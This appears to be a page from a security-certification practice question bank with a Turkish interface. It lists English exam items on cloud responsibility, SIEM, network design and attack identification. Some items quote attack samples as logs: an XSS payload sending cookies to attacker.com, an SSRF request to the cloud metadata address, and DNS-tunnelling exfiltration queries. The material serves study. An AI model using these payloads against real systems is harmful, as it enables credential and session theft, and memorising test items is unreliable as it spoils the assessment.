Tüm alıştırma soruları
2232 soru
A software-as-a-service (SaaS) provider needs to give prospective clients a high-level summary of its security and compliance posture. The document must be suitable for general public distribution without requiring a Non-Disclosure Agreement (NDA). Which attestation report is specifically designed for this purpose?
A software company hosts a critical customer service portal on a Managed Kubernetes platform (PaaS). The cloud service provider (CSP) maintains the master control plane, hypervisor infrastructure, and worker node operating system updates. During a recent vulnerability scan, security auditors identified critical security flaws in the application runtime dependencies packaged inside the deployment container images. Which of the following actions represents the customer's responsibility under the cloud shared responsibility model to remediate these vulnerabilities?
A medical clinic wants to allow guest patients to access the internet via wireless access points while ensuring their traffic is completely isolated from the internal network housing sensitive Electronic Health Record (EHR) systems. Which of the following network design strategies should the security administrator implement on the existing network infrastructure to achieve this isolation?
An enterprise financial organization is designing a hybrid cloud connectivity model for an analytics workload that dynamically offloads data processing from on-premises servers to a public cloud Platform as a Service (PaaS) environment. Security policy mandates that data in transit must never traverse the public internet, data endpoints must not expose public IP addresses, and customer responsibility must be limited strictly to application logic, data classification, and access policies without host management overhead. Which of the following architecture designs and responsibility allocations best fulfills these requirements?
An enterprise security operations team investigates anomalous traffic patterns within a corporate dual-stack subnetwork. Network monitoring alerts indicate that multiple workstations have dynamically updated their default gateway settings to route external traffic through an unapproved link-local address. Packet captures reveal continuous, unsolicited ICMPv6 Type 134 messages being broadcast across the segment with a high router preference flag enabled. Which of the following attack types is indicated by these findings?
A security administrator is documenting the secure network transit path for a remote system administrator to access a sensitive internal database server via a bastion host. Arrange the following network zones in order from the initial connection point (least secure/untrusted external) to the final destination (most secure internal target).
Öğeleri doğru sıraya koymak için sürükleyin
A security team is reviewing a web microservice that accepts user-supplied remote image URLs to generate user avatar previews. During testing, an analyst discovers that submitting a URL directed to `http://169.254.169.254/latest/meta-data/` allows the server to fetch and return sensitive cloud instance credentials to the client.
Which of the following mitigation controls should the development team implement to remediate this application vulnerability? (Select TWO.)
Geçerli olan tümünü seçin
A security technician inspecting web server access logs in a SIEM dashboard analyzes the following log entry:
`192.168.10.45 - - [27/Jul/2026:14:15:22 +0000] "GET /comment.php?user_input=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script> HTTP/1.1" 200 452`
Which of the following security events is demonstrated in this log snippet?
An organization needs to prevent customer service representatives from copying sensitive customer database files to unauthorized USB flash drives attached to local workstations. Which data protection control should the security analyst implement to enforce this restriction?
A threat intelligence analyst at a commercial bank needs to obtain timely, industry-specific operational intelligence regarding emerging tactics, techniques, and procedures (TTPs) targeting core payment processing gateways. The security leadership wants to exchange attack indicators and vetted threat data directly with peer financial institutions in a trusted environment. Which of the following threat intelligence sources is most appropriate for this objective?
An organization deploys a centralized Security Information and Event Management (SIEM) platform to monitor enterprise infrastructure. In what sequence does a security log event travel through the SIEM pipeline from initial creation to analyst notification?
Öğeleri doğru sıraya koymak için sürükleyin
A security analyst is establishing a patch and configuration management procedure for an air-gapped Industrial Control System (ICS) network following the disclosure of a critical firmware vulnerability. Which of the following technical controls and procedural steps should the analyst execute to ensure safe patch deployment and maintain system baselines? (Select TWO.)
Geçerli olan tümünü seçin
An enterprise security operations center (SOC) detects that several remote staff members were redirected to a fraudulent Single Sign-On (SSO) credential-harvesting page after scanning a Quick Response (QR) code on physical flyers posted in a corporate office building. The flyers purported to contain a link to a mandatory employee workplace survey. Which social engineering attack vector best describes this technique?
An enterprise organization plans to establish a direct network link and federated single sign-on integration with a strategic partner to facilitate real-time data exchange between their respective data centers. Before configuring the VPN tunnel and enabling communication between the two distinct networks, security administrators from both entities must establish a formal document specifying the technical interface standards, security control requirements, and data transfer protocols governing the network connection itself. Which of the following agreements is most appropriate to satisfy this requirement?
A security technician is troubleshooting a user access issue on a corporate document platform. The user successfully validates their password and multi-factor authentication prompt at login. However, when attempting to open shared department folders, the platform denies access with a 'Privilege Insufficient' error. System logs confirm that the identity provider successfully verified who the user is, but failed to evaluate or grant access permissions to the requested resources. Which component of the AAA framework is failing to execute as intended?
A security engineer is optimizing an enterprise Security Information and Event Management (SIEM) data ingestion pipeline to handle heterogeneous log streams from firewalls, web proxies, and endpoint agents. To perform cross-source security analytics without overwhelming system storage or failing complex detection logic, incoming event data must pass through sequential processing phases. What is the correct sequential order of log processing stages within the SIEM pipeline, from initial raw data ingestion to final security analyst escalation?
Öğeleri doğru sıraya koymak için sürükleyin
A biotechnology company is deploying a cloud-native genomic analysis pipeline utilizing a Function-as-a-Service (FaaS) model coupled with managed cloud object storage. The lead security architect is formalizing operational boundaries to comply with the cloud shared responsibility model. Which of the following tasks remains exclusively the responsibility of the biotechnology company?
A security analyst reviewing SIEM alert logs identifies the following sequential events originating from an internal workstation:
2026-07-27T14:02:11Z Event: DNS_QUERY SrcIP: 10.0.4.150 DstIP: 8.8.8.8 Query: c2FtcGxlZGF0YWV4Zmls.malicious-domain.com RecordType: TXT Length: 512
2026-07-27T14:02:12Z Event: DNS_QUERY SrcIP: 10.0.4.150 DstIP: 8.8.8.8 Query: dG9wc2VjcmV0ZG9jcw==.malicious-domain.com RecordType: TXT Length: 512
2026-07-27T14:02:13Z Event: DNS_QUERY SrcIP: 10.0.4.150 DstIP: 8.8.8.8 Query: cGFzc3dvcmRoYXNoZXM=.malicious-domain.com RecordType: TXT Length: 512
Which of the following security threats is directly indicated by these log entries?
An enterprise security architecture team is evaluating modern Identity and Access Management (IAM) components to enhance security across hybrid environments. Based on enterprise security best practices, how should each IAM standard or architecture component be matched to its primary architectural role?
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A Security Operations Center (SOC) analyst investigating a high-severity alert in a SIEM platform correlates the following consecutive syslog entries from an internal recursive DNS resolver:
text
2026-07-27T14:22:01Z dns-resolver named[2048]: client 10.2.14.88#49152 (v1-a8f9c2d1e.exfil.external-collector.net): query: v1-a8f9c2d1e.exfil.external-collector.net IN TXT + (10.2.0.1)
2026-07-27T14:22:02Z dns-resolver named[2048]: client 10.2.14.88#49153 (v2-b7e8d3c4a.exfil.external-collector.net): query: v2-b7e8d3c4a.exfil.external-collector.net IN TXT + (10.2.0.1)
2026-07-27T14:22:03Z dns-resolver named[2048]: client 10.2.14.88#49154 (v3-f5a6b7c8d.exfil.external-collector.net): query: v3-f5a6b7c8d.exfil.external-collector.net IN TXT + (10.2.0.1)
Based on the log attributes, which of the following security events is occurring on host 10.2.14.88?